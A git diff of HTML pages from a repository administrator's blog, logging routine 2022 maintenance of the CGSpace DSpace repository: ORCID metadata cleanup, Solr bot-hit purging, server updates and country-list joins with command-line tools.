+<li>Meeting with Margarita and Manuel from ABC to discuss uploading ~6,000 automatically-generated CRP policy reports from MARLO to CGSpace
+<ul>
+<li>They will try to provide the records and PDFs by mid June because they are still finalizing the reports for 2021</li>
+<li>MARLO will be going offline because it was for the CRPs</li>
+<li>We reviewed the metadata they have and gave them some advice on the formatting</li>
+<li>Once we upload the records I will need to provide them with a mapping of the MARLO URLs to Handle URLs so they can set up redirects</li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-05-14">2022-05-14</h2>
+<ul>
+<li>Start a full Discovery index</li>
+<li>Start an AReS harvest</li>
+</ul>
+<h2 id="2022-05-23">2022-05-23</h2>
+<ul>
+<li>Start an AReS harvest</li>
+</ul>
+<h2 id="2022-05-24">2022-05-24</h2>
+<ul>
+<li>Update CGSpace to latest <code>6_x-prod</code> branch, which removes a handful of Mirage 2 themes and migrates to Node.js 14 and some newer build deps</li>
+<li>Run all system updates on CGSpace (linode18) and reboot it</li>
+</ul>
+<h2 id="2022-05-25">2022-05-25</h2>
+<ul>
+<li>Maria Garruccio sent me a handful of new ORCID identifiers for Alliance staff
+<ul>
+<li>We currently have 1349 unique identifiers and this adds about forty-five new ones (!):</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ grep -oE <span style="color:#e6db74">&#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39;</span> ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-identifier.xml | sort | uniq | wc -l
+</span></span><span style="display:flex;"><span>1349
+</span></span><span style="display:flex;"><span>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-identifier.xml /tmp/new-abc-orcids.txt | grep -oE <span style="color:#e6db74">&#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39;</span> | sort | uniq &gt; /tmp/2022-05-25-combined-orcids.txt
+</span></span><span style="display:flex;"><span>$ wc -l /tmp/2022-05-25-combined-orcids.txt
+</span></span><span style="display:flex;"><span>1395 /tmp/2022-05-25-combined-orcids.txt
+</span></span></code></pre></div><ul>
+<li>After combining and filtering them I resolved their names using my <code>resolve-orcids.py</code> script:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/resolve-orcids.py -i /tmp/2022-05-25-combined-orcids.txt -o /tmp/2022-05-25-combined-orcids-names.txt
+</span></span></code></pre></div><ul>
+<li>There are some names that changed, so I need to run them through the <code>fix-metadata-values.py</code> script:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat 2022-05-25-update-orcids.csv
+</span></span><span style="display:flex;"><span>cg.creator.identifier,correct
+</span></span><span style="display:flex;"><span>&#34;Andrea Fongar: 0000-0003-2084-1571&#34;,&#34;ANDREA CECILIA SANCHEZ BOGADO: 0000-0003-4549-6970&#34;
+</span></span><span style="display:flex;"><span>&#34;Bekele Shiferaw: 0000-0002-3645-320X&#34;,&#34;Bekele A. Shiferaw: 0000-0002-3645-320X&#34;
+</span></span><span style="display:flex;"><span>&#34;Henry Kpaka: 0000-0002-7480-2933&#34;,&#34;Henry Musa Kpaka: 0000-0002-7480-2933&#34;
+</span></span><span style="display:flex;"><span>&#34;Josephine Agogbua: 0000-0001-6317-1227&#34;,&#34;Josephine Udunma Agogbua: 0000-0001-6317-1227&#34;
+</span></span><span style="display:flex;"><span>&#34;Martha Lilia Del Río Duque: 0000-0002-0879-0292&#34;,&#34;Martha Del Río: 0000-0002-0879-0292&#34;
+</span></span><span style="display:flex;"><span>$ ./ilri/fix-metadata-values.py -i 2022-05-25-update-orcids.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -f cg.creator.identifier -m <span style="color:#ae81ff">247</span> -t correct -d -n
+</span></span><span style="display:flex;"><span>Connected to database.
+</span></span><span style="display:flex;"><span>Would fix 4 occurences of: Andrea Fongar: 0000-0003-2084-1571
+</span></span><span style="display:flex;"><span>Would fix 1 occurences of: Bekele Shiferaw: 0000-0002-3645-320X
+</span></span><span style="display:flex;"><span>Would fix 2 occurences of: Josephine Agogbua: 0000-0001-6317-1227
+</span></span><span style="display:flex;"><span>Would fix 34 occurences of: Martha Lilia Del Río Duque: 0000-0002-0879-0292
+</span></span></code></pre></div><h2 id="2022-05-26">2022-05-26</h2>
+<ul>
+<li>I extracted the names and ORCID identifiers from Maria&rsquo;s spreadsheet and produced several CSV files with different name formats:
+<ul>
+<li>First Last (GREL: <code>cells['First Name'].value + ' ' + cells['Surname'].value</code>)</li>
+<li>Last, First (GREL: <code>cells['Surname'].value + &quot;, &quot; + cells['First Name'].value</code>)</li>
+<li>Last, F. (GREL: <code>cells['Surname'].value + &quot;, &quot; + cells['First Name'].value.substring(0, 1) + &quot;.&quot;</code>)</li>
+</ul>
+</li>
+<li>Then I constructed a CSV for each of these variations to use with <code>add-orcid-identifiers-csv.py</code>
+<ul>
+<li>In total I matched a bunch of authors and added 872 new metadata fields!</li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-05-27">2022-05-27</h2>
+<ul>
+<li>Send a follow up to Leroy from the Alliance to ask about the CIAT Library URLs
+<ul>
+<li>It seems that I forgot to attach the list of PDFs when I last communicated with him in 2022-03</li>
+</ul>
+</li>
+<li>Meeting with Terry Bucknell from Overton.io</li>
+</ul>
+<h2 id="2022-05-28">2022-05-28</h2>
+<ul>
+<li>Start a harvest on AReS</li>
+</ul>
+<h2 id="2022-05-30">2022-05-30</h2>
+<ul>
+<li>Help IITA with some collection authorization issues on CGSpace</li>
+<li>Finally looking into Peter&rsquo;s Altmetric export from 2022-02
+<ul>
+<li>We want to try to compare some of the information about open access status with that in CGSpace</li>
+<li>I created a new column for all items that have CGSpace handles using this GREL:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>&#34;https://hdl.handle.net/&#34; + value.match(/.*?(10568\/\d+).*?/)[0]
+</span></span></code></pre></div><ul>
+<li>With that I can do a join on the CGSpace metadata and perhaps clean up some items</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./bin/dspace metadata-export -f 2022-05-30-cgspace.csv
+</span></span><span style="display:flex;"><span>$ csvcut -c <span style="color:#e6db74">&#39;id,dc.identifier.uri[en_US],dcterms.accessRights[en_US],dcterms.license[en_US]&#39;</span> 2022-05-30-cgspace.csv | sed <span style="color:#e6db74">&#39;1 s/dc\.identifier\.uri\[en_US\]/dc.identifier.uri/&#39;</span> &gt; /tmp/cgspace.csv
+</span></span><span style="display:flex;"><span>$ csvjoin -c <span style="color:#e6db74">&#39;dc.identifier.uri&#39;</span> ~/Downloads/2022-05-30-Altmetric-Research-Outputs-CGSpace.csv /tmp/cgspace.csv &gt; /tmp/cgspace-altmetric.csv
+</span></span></code></pre></div><ul>
+<li>Examining the data in OpenRefine I spot checked a few records where Altmetric and CGSpace disagree and in most cases I found Altmetric to be wrong&hellip;</li>
+</ul>
+<!-- raw HTML omitted -->
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2022-06/index.html b/docs/2022-06/index.html
new file mode 100644
index 000000000..11f6bc84a
--- /dev/null
+++ b/docs/2022-06/index.html
@@ -0,0 +1,512 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="June, 2022" />
+<meta property="og:description" content="2022-06-06
+
+Look at the Solr statistics on CGSpace
+
+I see 167,000 hits from a bunch of Microsoft IPs with reverse DNS &ldquo;msnbot-&rdquo; using the Solr query dns:*msnbot* AND dns:*.msn.com
+I purged these first so I could see the other &ldquo;real&rdquo; IPs in the Solr facets
+
+
+I see 47,500 hits from 80.248.237.167 on a data center ISP in Sweden, using a normal user agent
+I see 13,000 hits from 163.237.216.11 on a data center ISP in Australia, using a normal user agent
+I see 7,300 hits from 208.185.238.57 from Britanica, using a normal user agent
+
+There seem to be many more of these:
+
+
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2022-06/" />
+<meta property="article:published_time" content="2022-06-06T09:01:36+03:00" />
+<meta property="article:modified_time" content="2023-04-27T13:10:13-07:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="June, 2022"/>
+<meta name="twitter:description" content="2022-06-06
+
+Look at the Solr statistics on CGSpace
+
+I see 167,000 hits from a bunch of Microsoft IPs with reverse DNS &ldquo;msnbot-&rdquo; using the Solr query dns:*msnbot* AND dns:*.msn.com
+I purged these first so I could see the other &ldquo;real&rdquo; IPs in the Solr facets
+
+
+I see 47,500 hits from 80.248.237.167 on a data center ISP in Sweden, using a normal user agent
+I see 13,000 hits from 163.237.216.11 on a data center ISP in Australia, using a normal user agent
+I see 7,300 hits from 208.185.238.57 from Britanica, using a normal user agent
+
+There seem to be many more of these:
+
+
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "June, 2022",
+  "url": "https://alanorth.github.io/cgspace-notes/2022-06/",
+  "wordCount": "1788",
+  "datePublished": "2022-06-06T09:01:36+03:00",
+  "dateModified": "2023-04-27T13:10:13-07:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2022-06/">
+
+    <title>June, 2022 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2022-06/">June, 2022</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2022-06-06T09:01:36+03:00">Mon Jun 06, 2022</time>
+ in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2022-06-06">2022-06-06</h2>
+<ul>
+<li>Look at the Solr statistics on CGSpace
+<ul>
+<li>I see 167,000 hits from a bunch of Microsoft IPs with reverse DNS &ldquo;msnbot-&rdquo; using the Solr query <code>dns:*msnbot* AND dns:*.msn.com</code></li>
+<li>I purged these first so I could see the other &ldquo;real&rdquo; IPs in the Solr facets</li>
+</ul>
+</li>
+<li>I see 47,500 hits from 80.248.237.167 on a data center ISP in Sweden, using a normal user agent</li>
+<li>I see 13,000 hits from 163.237.216.11 on a data center ISP in Australia, using a normal user agent</li>
+<li>I see 7,300 hits from 208.185.238.57 from Britanica, using a normal user agent
+<ul>
+<li>There seem to be many more of these:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># zcat --force /var/log/nginx/access.log* | grep 208.185.238. | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq -c | sort -h
+</span></span><span style="display:flex;"><span>      2 208.185.238.1
+</span></span><span style="display:flex;"><span>    166 208.185.238.54
+</span></span><span style="display:flex;"><span>   1293 208.185.238.51
+</span></span><span style="display:flex;"><span>   2587 208.185.238.59
+</span></span><span style="display:flex;"><span>   4692 208.185.238.56
+</span></span><span style="display:flex;"><span>   5480 208.185.238.53
+</span></span><span style="display:flex;"><span>   6277 208.185.238.52
+</span></span><span style="display:flex;"><span>   6400 208.185.238.58
+</span></span><span style="display:flex;"><span>   8261 208.185.238.55
+</span></span><span style="display:flex;"><span>  17549 208.185.238.57
+</span></span></code></pre></div><ul>
+<li>I see 3,000 hits from 178.208.75.33 by a Russian-owned IP in the Netherlands that is making a GET to / every one minute, using a normal user agent</li>
+<li>I see 3,000 hits from 134.122.124.196 on Digital Ocean to the REST API with a normal user agent</li>
+<li>I purged all these hits from IPs for a total of about 265,000</li>
+<li>Then I faceted by user agent and found
+<ul>
+<li>1,000 hits by <code>insomnia/2022.2.1</code>, which I also saw last month and submitted to COUNTER-Robots</li>
+<li>265 hits by <code>omgili/0.5 +http://omgili.com</code></li>
+<li>150 hits by <code>Vizzit</code></li>
+<li>132 hits by <code>MetaInspector/5.7.0 (+https://github.com/jaimeiniesta/metainspector)</code></li>
+<li>73 hits by <code>Scoop.it</code></li>
+<li>62 hits by <code>bitdiscovery</code></li>
+<li>59 hits by <code>Asana/1.4.0 WebsiteMetadataRetriever</code></li>
+<li>32 hits by <code>Sprout Social (Link Attachment)</code></li>
+<li>29 hits by <code>CyotekWebCopy/1.9 CyotekHTTP/6.2</code></li>
+<li>20 hits by <code>Hootsuite-Authoring/1.0</code></li>
+</ul>
+</li>
+<li>I purged about 4,100 hits from these user agents</li>
+<li>Run all system updates on AReS server (linode20) and reboot</li>
+<li>I want to try to update some of the build dependencies of OpenRXV since Node.js 12 is no longer supported</li>
+<li>Upgrade linode20 to Ubuntu 22.04 and start an AReS harvest</li>
+<li>I merged the <a href="https://github.com/DSpace/DSpace/pull/8292">Mirage 2 build fix</a> to <code>dspace-6_x</code> for DSpace 6.4</li>
+</ul>
+<h2 id="2022-06-07">2022-06-07</h2>
+<ul>
+<li>I tested Node.js 14 one more time with vanilla DSpace 6.4-SNAPSHOT and with the CGSpace source and it worked well
+<ul>
+<li>I made <a href="https://github.com/DSpace/DSpace/pull/8331">a pull request</a> to DSpace to use Node.js 14 for Mirage 2</li>
+<li>I even tested Node.js 16 and it works, but that is enough for now&hellip;</li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-06-08">2022-06-08</h2>
+<ul>
+<li>Work on AReS a bit since I wasn&rsquo;t able to harvest after doing the updates on the server and in the containers a few days ago
+<ul>
+<li>I don&rsquo;t know what the problem was really, but on the server I had to enable IPv4 forwarding so the frontend container would build</li>
+<li>Once I downed and upped AReS with docker-compose I was able to start a new harvest</li>
+<li>I also did some tests to enable ES2020 target in the backend because we&rsquo;re on Node.js 14 there now</li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-06-13">2022-06-13</h2>
+<ul>
+<li>Create a user for Mohammed Salem to test MEL submission on DSpace Test:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ dspace user -a -m mel-submit@cgiar.org -g MEL -s Submit -p <span style="color:#e6db74">&#39;owwwwwwww&#39;</span>
+</span></span></code></pre></div><ul>
+<li>According to my notes from <a href="/cgspace-notes/2020-10/">2020-10</a> the account must be in the admin group in order to submit via the REST API</li>
+</ul>
+<h2 id="2022-06-14">2022-06-14</h2>
+<ul>
+<li>Start a harvest on AReS</li>
+</ul>
+<h2 id="2022-06-16">2022-06-16</h2>
+<ul>
+<li>Francesca asked us to add the CC-BY-3.0-IGO license to the submission form on CGSpace
+<ul>
+<li>I remember I <a href="https://github.com/spdx/license-list-XML/issues/767">had requested SPDX to add CC-BY-NC-ND-3.0-IGO</a> in 2019-02, and they finally <a href="https://github.com/spdx/license-list-XML/pull/1068">merged it</a> in 2020-07, but I never added it to CGSpace</li>
+<li>I will add the full suite of CC 3.0 IGO licenses to CGSpace and then make a request to SPDX for the others:
+- CC-BY-3.0-IGO
+- CC-BY-SA-3.0-IGO
+- CC-BY-ND-3.0-IGO
+- CC-BY-NC-3.0-IGO
+- CC-BY-NC-SA-3.0-IGO
+- CC-BY-NC-ND-3.0-IGO</li>
+</ul>
+</li>
+<li>I filed <a href="https://github.com/spdx/license-list-XML/issues/1525">an issue asking for SPDX to add CC-BY-3.0-IGO</a></li>
+<li>Meeting with Moayad from CodeObia to discuss OpenRXV
+<ul>
+<li>He added the ability to use multiple indexes / dashboards, and to be able to embed them in iframes</li>
+</ul>
+</li>
+<li>Add <code>cg.contributor.initiative</code> with a controlled vocabulary based on CLARISA&rsquo;s list to the CGSpace submission form</li>
+<li>Switch to the <code>linux-virtual-hwe-20.04</code> kernel on CGSpace (linode18), run all system updates, and reboot</li>
+</ul>
+<h2 id="2022-06-17">2022-06-17</h2>
+<ul>
+<li>I noticed a few ORCID identifiers missing for some scientists so I added them to the controlled vocabulary and then tagged them on CGSpace:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat 2022-06-17-add-orcids.csv
+</span></span><span style="display:flex;"><span>dc.contributor.author,cg.creator.identifier
+</span></span><span style="display:flex;"><span>&#34;Tijjani, A.&#34;,&#34;Abdulfatai Tijjani: 0000-0002-0793-9059&#34;
+</span></span><span style="display:flex;"><span>&#34;Tijjani, Abdulfatai&#34;,&#34;Abdulfatai Tijjani: 0000-0002-0793-9059&#34;
+</span></span><span style="display:flex;"><span>&#34;Mrode, Raphael A.&#34;,&#34;Raphael Mrode: 0000-0003-1964-5653&#34;
+</span></span><span style="display:flex;"><span>&#34;Okeyo Mwai, Ally&#34;,&#34;Ally Okeyo Mwai: 0000-0003-2379-7801&#34;
+</span></span><span style="display:flex;"><span>&#34;Ojango, Julie M.K.&#34;,&#34;Ojango J.M.K.: 0000-0003-0224-5370&#34;
+</span></span><span style="display:flex;"><span>&#34;Prendergast, J.G.D.&#34;,&#34;James Prendergast: 0000-0001-8916-018X&#34;
+</span></span><span style="display:flex;"><span>&#34;Ekine-Dzivenu, Chinyere&#34;,&#34;Chinyere Ekine-Dzivenu: 0000-0002-8526-435X&#34;
+</span></span><span style="display:flex;"><span>&#34;Ekine, C.&#34;,&#34;Chinyere Ekine-Dzivenu: 0000-0002-8526-435X&#34;
+</span></span><span style="display:flex;"><span>&#34;Ekine-Dzivenu, C.C&#34;,&#34;Chinyere Ekine-Dzivenu: 0000-0002-8526-435X&#34;
+</span></span><span style="display:flex;"><span>&#34;Shilomboleni, Helena&#34;,&#34;Helena Shilomboleni: 0000-0002-9875-6484&#34;
+</span></span><span style="display:flex;"><span>$ ./ilri/add-orcid-identifiers-csv.py -i /tmp/2022-06-17-add-orcids.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> | tee /tmp/orcids.log
+</span></span><span style="display:flex;"><span>$ grep -c <span style="color:#e6db74">&#39;Adding ORCID&#39;</span> /tmp/orcids2.log 
+</span></span><span style="display:flex;"><span>304
+</span></span></code></pre></div><ul>
+<li>Also make some changes to the Discovery facets and item view
+<ul>
+<li>I reduced the number of items to show for CRP facets from 20 to 5</li>
+<li>I added a facet for the Initiatives</li>
+<li>I re-organized a few parts of the item view to add Action Areas and the list of author affiliations</li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-06-18">2022-06-18</h2>
+<ul>
+<li>I deployed the changes on CGSpace and started a full Discovery index for the new Initiatives facet</li>
+<li>Run <code>dspace cleanup -v</code> on CGSpace</li>
+</ul>
+<h2 id="2022-06-20">2022-06-20</h2>
+<ul>
+<li>Add missing ORCID identifier for ILRI staff to CGSpace and tag their items</li>
+</ul>
+<h2 id="2022-06-21">2022-06-21</h2>
+<ul>
+<li>Work on OpenRXV backend dependencies
+<ul>
+<li>Update Elasticsearch and TypeScript and eslint</li>
+</ul>
+</li>
+<li>Sit in on webinar about contributing terms to AGROVOC
+<ul>
+<li>I agreed that I would send Sara Jani from ICARDA a list of new terms we have that don&rsquo;t match AGROVOC by end of June</li>
+<li>I need to indicate which center is using them so we can have an appropriate expert review the terms</li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-06-22">2022-06-22</h2>
+<ul>
+<li>I re-deployed AReS with the latest OpenRXV changes then started a fresh harvest</li>
+<li>Meeting with Salem to discuss metadata between CGSpace and MEL
+<ul>
+<li>We started working through his spreadsheet and then the Internet dropped</li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-06-23">2022-06-23</h2>
+<ul>
+<li>Start looking at country names between MEL, CGSpace, and standards like UN M.49 and GeoNames
+<ul>
+<li>I used <code>xmllint</code> to extract the countries from CGSpace&rsquo;s input forms:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ xmllint --xpath <span style="color:#e6db74">&#39;//value-pairs[@value-pairs-name=&#34;countrylist&#34;]/pair/stored-value/node()&#39;</span> dspace/config/input-forms.xml &gt; /tmp/cgspace-countries.txt
+</span></span></code></pre></div><ul>
+<li>Then I wrote a Python script (<code>countries-to-csv.py</code>) to read them and save their names alongside the ISO 3166-1 Alpha2 code</li>
+<li>Then I joined them with the other lists:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvjoin --outer -c alpha2 ~/Downloads/clarisa-countries.csv ~/Downloads/UNSD<span style="color:#ae81ff">\ </span>—<span style="color:#ae81ff">\ </span>Methodology.csv ~/Downloads/geonames-countries.csv /tmp/cgspace-countries.csv /tmp/mel-countries.csv&gt; /tmp/countries.csv
+</span></span></code></pre></div><ul>
+<li>This mostly worked fine, and is much easier than writing another Python script with Pandas&hellip;</li>
+</ul>
+<h2 id="2022-06-24">2022-06-24</h2>
+<ul>
+<li>Spent some more time working on my <code>countries-to-csv.py</code> script to fix some logic errors</li>
+<li>Then re-export the UN M.49 countries to a clean list because the one I did yesterday somehow has errors:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>csvcut -d &#39;;&#39; -c &#39;ISO-alpha2 Code,Country or Area&#39; ~/Downloads/UNSD\ —\ Methodology.csv | sed -e &#39;1s/ISO-alpha2 Code/alpha2/&#39; -e &#39;1s/Country or Area/UN M.49 Name/&#39; &gt; ~/Downloads/un-countries.csv
+</span></span></code></pre></div><ul>
+<li>Check the number of lines in each file:</li>
+</ul>
+<pre tabindex="0"><code>$ wc -l clarisa-countries.csv un-countries.csv cgspace-countries.csv mel-countries.csv
+  250 clarisa-countries.csv
+  250 un-countries.csv
+  198 cgspace-countries.csv
+  258 mel-countries.csv
+</code></pre><ul>
+<li>I am seeing strange results with csvjoin&rsquo;s <code>--outer</code> join that I need to keep unmatched terms from both left and right files&hellip;
+<ul>
+<li>Using <code>xsv join --full</code> is giving me better results:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ xsv join --full alpha2 ~/Downloads/clarisa-countries.csv alpha2 ~/Downloads/un-countries.csv | xsv select &#39;!alpha2[1]&#39; &gt; /tmp/clarisa-un-xsv-full.csv
+</code></pre><ul>
+<li>Then adding the CGSpace and MEL countries:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ xsv join --full alpha2 /tmp/clarisa-un-xsv-full.csv alpha2 /tmp/cgspace-countries.csv | xsv <span style="color:#66d9ef">select</span> <span style="color:#e6db74">&#39;!alpha2[1]&#39;</span> &gt; /tmp/clarisa-un-cgspace-xsv-full.csv
+</span></span><span style="display:flex;"><span>$ xsv join --full alpha2 /tmp/clarisa-un-cgspace-xsv-full.csv alpha2 /tmp/mel-countries.csv | xsv <span style="color:#66d9ef">select</span> <span style="color:#e6db74">&#39;!alpha2[1]&#39;</span> &gt; /tmp/clarisa-un-cgspace-mel-xsv-full.csv
+</span></span></code></pre></div><h2 id="2022-06-26">2022-06-26</h2>
+<ul>
+<li>Start a harvest on AReS</li>
+</ul>
+<h2 id="2022-06-28">2022-06-28</h2>
+<ul>
+<li>Start working on the CGSpace subject export for FAO / AGROVOC</li>
+<li>First I exported a list of all metadata in our <code>dcterms.subject</code> and other center-specific subject fields with their counts:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspacetest= ☘ \COPY (SELECT DISTINCT text_value AS &#34;subject&#34;, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (187, 120, 210, 122, 215, 127, 208, 124, 128, 123, 125, 135, 203, 236, 238, 119) GROUP BY &#34;subject&#34; ORDER BY count DESC) to /tmp/2022-06-28-cgspace-subjects.csv WITH CSV HEADER;
+</span></span><span style="display:flex;"><span>COPY 27010
+</span></span></code></pre></div><ul>
+<li>Then I extracted the subjects and looked them up against AGROVOC:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c subject /tmp/2022-06-28-cgspace-subjects.csv | sed <span style="color:#e6db74">&#39;1d&#39;</span> &gt; /tmp/2022-06-28-cgspace-subjects.txt
+</span></span><span style="display:flex;"><span>$ ./ilri/agrovoc-lookup.py -i /tmp/2022-06-28-cgspace-subjects.txt -o /tmp/2022-06-28-cgspace-subjects-results.csv
+</span></span></code></pre></div><ul>
+<li>I keep getting timeouts after every five or ten requests, so this will not be feasible for 27,000 subjects!</li>
+<li>I think I will have to write some custom script to use the AGROVOC RDF file
+<ul>
+<li>Using rdflib to open the 1.2GB <code>agrovoc_lod.rdf</code> file takes several minutes and doesn&rsquo;t seem very efficient</li>
+</ul>
+</li>
+<li>I tried using <a href="https://github.com/ozekik/lightrdf">lightrdf</a> and it&rsquo;s much quicker, but the documentation is limited and I&rsquo;m not sure how to search yet
+<ul>
+<li>I had to try in different Python versions because 3.10.x is apparently too new</li>
+</ul>
+</li>
+<li>For future reference I was able to search with lightrdf:</li>
+</ul>
